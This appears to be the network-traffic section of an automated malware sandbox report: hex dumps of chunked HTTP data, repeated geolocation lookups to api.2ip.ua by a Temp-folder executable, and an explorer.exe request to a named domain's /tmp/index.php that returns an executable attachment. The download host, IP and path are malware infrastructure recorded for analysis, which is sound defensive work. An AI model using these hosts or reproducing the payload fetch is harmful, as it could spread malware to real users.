2023-07-27 18:18:58 UTC	236	IN	Data Raw: 32 30 30 30 0d 0a b1 d9 47 5a e0 89 53 53 72 09 cb ed 61 d0 ce 1c d0 a3 b4 65 1f dd 66 7e 6f a9 14 36 65 e1 8c 36 bf 09 c9 ce 27 1e 25 84 e9 18 d9 98 c2 c8 b3 ed f5 eb 33 82 0d e4 26 36 f5 a9 3c 27 6e 02 80 02 8a 21 3d 06 b0 9a 55 bb d5 ab 12 c1 27 39 32 68 27 6b 8f 4a 1b 49 cf e7 b9 ef f9 e4 a7 e6 56 18 77 bc c5 56 bf 66 d6 91 15 b3 2a ba b8 60 3a 24 43 1b ad 49 1e cc b0 f3 86 a3 fb f8 85 7a 85 e8 f6 a5 ee 5f 82 73 cc b2 15 71 b5 77 b1 60 07 e3 46 41 f1 c6 86 c4 2d b4 a6 74 9d 53 62 4e 11 60 3d 17 d6 10 6a 8d ca 6e 76 6d 9e b6 9e 05 b3 b4 74 9a 13 56 47 bd 33 1d 3f 6b d2 e7 2a be 64 0b cf b3 28 7e 95 ef 62 11 e2 4e 06 8c 8a 61 75 6c f5 29 36 86 a7 66 1c da a9 72 e9 a8 5b 88 36 4b 3b 3f a5 9d 0e 96 af 2f 73 79 86 ac 10 66 91 72 be a6 3b fc b6 1f 0b cb 3a Data Ascii: 2000GZSSraef~o6e6'%3&6<'n!=U'92h'kJIVwVf`:$CIz_sqw`FA-tSbN`=jnvmtVG3?kd(~bNaul)6fr[6K;?/syfr;:
2023-07-27 18:18:58 UTC	244	IN	Data Raw: 83 84 84 81 7e 7b Data Ascii: ~{
2023-07-27 18:18:58 UTC	244	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	244	IN	Data Raw: 32 30 30 30 0d 0a 7b 83 84 7c 81 7c 83 84 7e 81 7f 80 80 80 7a 86 7b 80 82 81 7f 7f 7b 86 84 79 80 83 7b 7e 86 82 84 7e 7f 80 7e 80 7e 80 7a 7d 84 84 7b 81 7d 86 81 80 82 81 7d 7a 81 80 85 80 81 7c 7d 7a 7e 7b 83 7c 80 84 82 81 7f 85 7f 84 81 83 82 7c 83 7f 81 83 82 81 7f 81 79 7c 7f 80 7d 7d 7d 7a 7f 7e 7f 7f 80 7e 7e 7d 82 7f 82 83 83 83 84 7c 7c 80 85 7c 7f 81 7d 81 7c 7b 86 7f 7d 7c 7f 7c 85 85 7c 7d 84 7e 00 00 00 00 00 00 00 00 00 00 00 00 81 7c 7d 82 7d 84 81 7e 7a 83 7b 7d 7a 81 7d 7f 83 7f 80 7d 85 81 7c 84 7e 7f 7b 7b 7d 7f 7e 81 83 7c 7e 7b 7a 7e 82 84 7e 7b 81 81 7f 84 84 7f 7d 7e 7a 83 7f 82 7b 81 84 84 7b 84 80 80 7c 82 83 83 80 81 85 84 85 84 7d 83 7c 82 85 7c 81 7f 7c 81 82 82 81 81 7c 7e 7d 83 85 81 7d 7c 81 7f 7b 81 83 7f 84 85 82 80 84 Data Ascii: 2000{\|\|~z{{y{~~~~z}{}}z\|}z~{\|\|y\|}}}z~~~}\|\|\|}\|{}\|\|\|}~\|}}~z{}z}}\|~{{}~\|~{z~~{}~z{{\|}\|\|\|\|~}}\|{
2023-07-27 18:18:58 UTC	252	IN	Data Raw: 7c 83 7f 80 79 84 Data Ascii: \|y
2023-07-27 18:18:58 UTC	252	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	252	IN	Data Raw: 31 66 66 38 0d 0a 81 7d 83 81 81 80 80 7a 7e 86 83 7c 82 7c 7a 84 83 80 7f 82 84 7f 81 80 81 7b 7f 7b 82 81 7a 83 7b 7e 80 7b 7a 7a 7e 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 85 82 83 84 7b 84 82 85 83 7e 7e 80 84 80 82 80 7f 80 83 84 7f 80 83 83 81 81 7f 7f 7b 7f 7c 7b 82 81 7b 7a 80 7a 80 7b 83 80 7e 7f 80 7b 83 83 81 7f 7d 80 80 80 7c 83 7b 7c 7e 85 82 82 7e 80 83 7c 7b 7c 83 84 7d 84 7b 82 85 7b 82 7f 82 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7f 80 83 83 81 83 80 81 83 7b 82 81 7d 83 7e 81 82 7f 86 7c 7c 7f 7f 86 7d 81 80 7c 84 80 81 7b 7f 7b 80 82 80 7e 80 80 7b 85 81 80 83 7c 81 84 7c 85 82 7d 84 7e 80 7c 84 84 82 7e 7f 7b 84 7d 84 7f 7c 83 80 85 81 83 7e 81 7f 7e 83 84 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 Data Ascii: 1ff8}z~\|\|z{{z{~{zz~~{~~{\|{{zz{~{}\|{\|~~\|{\|}{{{}~\|\|}\|{{~{\|\|}~\|~{}\|~~
2023-07-27 18:18:58 UTC	260	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:18:58 UTC	260	IN	Data Raw: 7f 7f 80 80 81 81 7e 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e 7f 81 7f 7f 7f 80 80 7f 7e 81 80 7e 80 80 80 7e 7f 7f 7f 7e 80 7f 80 80 7e 7f 81 81 81 80 7e 7e 7e 7f 7f 7f 7e 7f 81 80 7f 7f 7f 7f 7f 81 80 80 7e 81 80 81 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ~~~~~~~~~~~~~
2023-07-27 18:18:58 UTC	268	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	268	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	276	IN	Data Raw: 7f 80 7f 81 80 81 Data Ascii:
2023-07-27 18:18:58 UTC	276	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	276	IN	Data Raw: 32 30 30 30 0d 0a 80 7e 80 80 7f 80 7f 80 80 80 80 7e 80 7f 7f 7f 7e 7f 80 7e 7f 7e 80 81 80 7e 7e 81 00 00 00 00 81 80 7f 81 7e 80 80 81 7e 80 80 81 7f 7f 7f 7f 7f 7e 80 80 81 80 80 7f 81 80 7f 81 7f 7f 81 81 80 7e 80 7f 7f 7e 80 81 7f 80 7e 7e 80 7f 80 7f 7f 80 81 81 7e 80 81 81 81 7e 81 80 7e 7f 81 7e 80 80 80 7f 80 80 7f 7e 80 81 80 80 7f 7f 80 80 7f 7f 80 80 81 7e 80 80 7f 80 81 7e 7f 7e 80 80 7f 81 81 80 7e 80 81 7f 81 7f 81 7f 7f 80 80 80 7f 7e 80 80 80 80 81 80 7f 7f 81 80 00 00 00 00 81 80 7f 7e 81 7f 7e 80 81 81 80 80 7f 80 80 7f 7e 80 7e 80 7f 80 7f 80 80 80 81 81 81 7f 7f 80 7f 80 81 80 80 80 7f 7f 80 7e 80 80 80 7f 7f 7f 7f 80 7f 7e 7f 7f 7f 7e 80 81 7e 80 00 00 00 00 7f 80 7e 7f 80 7e 7f 81 80 7f 80 80 81 81 80 7e 80 81 80 7f 80 7f 7f 80 80 Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:18:58 UTC	284	IN	Data Raw: a3 31 62 0d 98 21 Data Ascii: 1b!
2023-07-27 18:18:58 UTC	284	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	284	IN	Data Raw: 32 30 30 30 0d 0a 1d 1d 1d 16 16 16 e0 e0 e0 54 65 5d 8c e8 8a 8a 8a 8a a3 12 bc 0d 98 1d e0 d6 d6 d6 a5 a5 a5 4b 4b 2c 65 22 34 e8 8a 8a 8a 8a a3 12 bc 0d 98 1d 16 16 e0 e0 e0 d6 d6 d6 a5 2c 65 22 34 e8 8a 8a 8a 8a 03 af bc 0d 98 21 1d 1d 1d 16 16 16 e0 e0 d6 54 65 c2 34 e8 8a 8a 8a 8a a3 12 bc cb 98 ca 21 91 91 91 1d 16 16 16 16 54 65 db 34 e8 8a 8a 8a 8a a3 31 8c cb 98 56 ca ca 21 21 91 91 91 1d 1d 54 65 17 9b e8 8a 8a 8a 8a a3 12 8c cb 98 a7 56 56 56 ca ca ca 21 21 21 20 65 17 9b e8 8a 8a 8a 8a a3 31 f2 3d 98 54 54 2c 2c 56 56 56 ca ca ca 20 65 17 11 a1 8a 8a 8a 8a ba a3 ae 83 ff ff ff 82 97 97 97 97 97 24 24 ff c5 b8 a3 ae 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a Data Ascii: 2000Te]KK,e"4,e"4!Te4!Te41V!!TeVVV!!! e1=TT,,VVV e$$
2023-07-27 18:18:58 UTC	292	IN	Data Raw: 81 7f 7f 7f 7f 80 Data Ascii:
2023-07-27 18:18:58 UTC	292	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	292	IN	Data Raw: 32 30 30 30 0d 0a 7f 81 7f 81 80 80 7f 7e 7f 80 81 80 80 81 7f 80 80 80 7f 7e 7f 7f 7f 80 7e 7f 7f 80 81 7e 80 7f 7f 80 81 80 81 7e 7e 7f 80 7e 81 80 7f 80 7f 81 80 7f 80 80 7e 81 81 7e 7f 7f 7e 7e 7e 80 7f 80 80 80 81 81 7f 80 81 7e 80 80 80 80 7f 80 81 7e 7e 7f 80 80 80 7f 81 80 7e 7e 7f 7e 7e 7e 80 7e 7e 81 7f 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 80 80 80 81 7f 80 7f 7f 7e 7e 7f 7e 80 7f 7f 7f 81 80 7e 7f 7f 7f 80 7e 81 80 80 7e 7f 7f 7f 7e 7f 7f 7f 7f 80 80 80 7f 7e 81 80 80 80 81 80 7f 7f 7f 7f 7e 7f 7f 7f 7f 80 80 80 80 81 80 81 7e 80 7f 80 80 7e 7e 7f 7f 7f 7f 81 7f 81 7e 7f 7e 7e 7e 81 80 7e 81 81 81 7f 81 7f 7f 80 80 80 80 7f 7e 80 80 81 80 7f 80 81 7e 81 81 7f 80 7f 81 7f 7e 80 80 7f 81 7f Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:18:58 UTC	300	IN	Data Raw: 7e 81 81 7f 7f 7f Data Ascii: ~
2023-07-27 18:18:58 UTC	300	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	300	IN	Data Raw: 32 30 30 30 0d 0a 80 7f 81 7f 81 80 7f 81 7f 7e 7e 80 81 80 81 80 7f 7e 80 7e 80 81 81 7e 80 7f 7e 7f 80 7f 7f 81 80 7f 81 7f 7f 80 80 81 7e 7f 80 7f 80 7e 80 80 7e 7f 81 81 81 7f 7f 7f 7e 81 7f 7f 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 7f 7e 81 7e 7e 7e 80 7f 80 7f 81 7e 7e 7f 80 80 81 7f 80 7f 7f 7e 7e 7f 81 7f 80 81 7e 7f 80 7f 80 7f 7f 7e 7e 7f 81 7f 81 7f 80 81 7e 7f 7f 7e 80 80 81 80 80 81 80 7f 80 80 80 7f 81 7f 7f 7e 7f 80 7f 7f 7e 80 7e 80 7f 7f 80 7f 7f 80 80 7e 80 81 00 00 00 00 00 00 00 00 00 00 00 00 7f 81 7e 81 7e 81 7f 80 81 80 81 80 7e 7e 81 80 7f 7f 7e 80 7f 81 7e 80 80 7e 80 7e 81 80 7f 7e 7e 7f 81 81 7f 7f 7f 7f 80 81 80 7f 81 80 7f 7f 80 80 80 80 7f 80 7f 7e 7f 81 7f 81 7f 7e 7f 7f 80 7e 81 81 81 7f 80 80 80 80 7f 7f 81 81 7e 81 7e Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:18:58 UTC	308	IN	Data Raw: ff ff f9 87 ff ff Data Ascii:
2023-07-27 18:18:58 UTC	308	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	308	IN	Data Raw: 32 30 30 30 0d 0a f8 87 ff ff f8 0f ff ff f8 00 ff ff f8 01 ff ff f8 03 ff ff f8 07 ff ff f8 0f 7f ff f8 1e 3f ff f8 3c 1f ff f8 78 0f ff f8 fc 1f ff f9 fe 3f ff ff ff 7f ff ff ff ff ff ff ff ff ff ff ff ff ff 28 00 00 00 18 00 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 00 00 c0 00 00 00 80 00 00 09 80 00 00 05 00 00 00 0f 80 00 00 07 c0 00 00 0f 80 00 00 0f 08 00 00 06 14 00 00 0c 22 00 00 00 14 00 00 00 08 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9f ff ff ff 1f ff ff fe Data Ascii: 2000?<x?(0@@"
2023-07-27 18:18:58 UTC	316	IN	Data Raw: 73 00 61 00 6a 00 Data Ascii: saj
2023-07-27 18:18:58 UTC	316	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	316	IN	Data Raw: 61 32 30 0d 0a 61 00 62 00 6f 00 20 00 78 00 65 00 76 00 55 00 4a 00 6f 00 66 00 75 00 62 00 65 00 76 00 6f 00 63 00 61 00 77 00 20 00 74 00 61 00 6e 00 65 00 20 00 67 00 6f 00 62 00 69 00 7a 00 75 00 6b 00 61 00 79 00 6f 00 62 00 20 00 68 00 61 00 6b 00 61 00 73 00 61 00 73 00 65 00 6b 00 61 00 76 00 61 00 6a 00 65 00 74 00 20 00 67 00 61 00 79 00 75 00 74 00 75 00 77 00 61 00 6b 00 75 00 79 00 61 00 20 00 76 00 75 00 78 00 69 00 79 00 65 00 20 00 70 00 61 00 66 00 65 00 6c 00 6f 00 63 00 20 00 64 00 69 00 79 00 69 00 70 00 69 00 67 00 65 00 74 00 65 00 63 00 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 00 5a 00 69 00 73 00 65 00 62 00 75 00 68 00 6f 00 6c 00 61 00 62 00 6f 00 20 00 72 00 69 00 6e 00 69 00 76 00 75 00 68 00 65 00 6e 00 6f 00 78 00 Data Ascii: a20abo xevUJofubevocaw tane gobizukayob hakasasekavajet gayutuwakuya vuxiye pafeloc diyipigeteco4Zisebuholabo rinivuhenox

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49696	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:02 UTC	318	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:02 UTC	318	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:02 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:02 UTC	319	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49697	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:04 UTC	319	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:04 UTC	320	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:04 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:04 UTC	320	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49699	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:05 UTC	321	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:05 UTC	321	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:05 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:05 UTC	321	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49719	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:13 UTC	322	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:13 UTC	322	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:13 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:13 UTC	322	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49730	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:16 UTC	323	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:16 UTC	323	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:16 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:16 UTC	324	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49817	80.66.203.53	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:34 UTC	324	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: shsplatform.co.uk
2023-07-27 18:19:34 UTC	324	IN	HTTP/1.1 200 OK Date: Thu, 27 Jul 2023 18:19:34 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=d14a8186.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
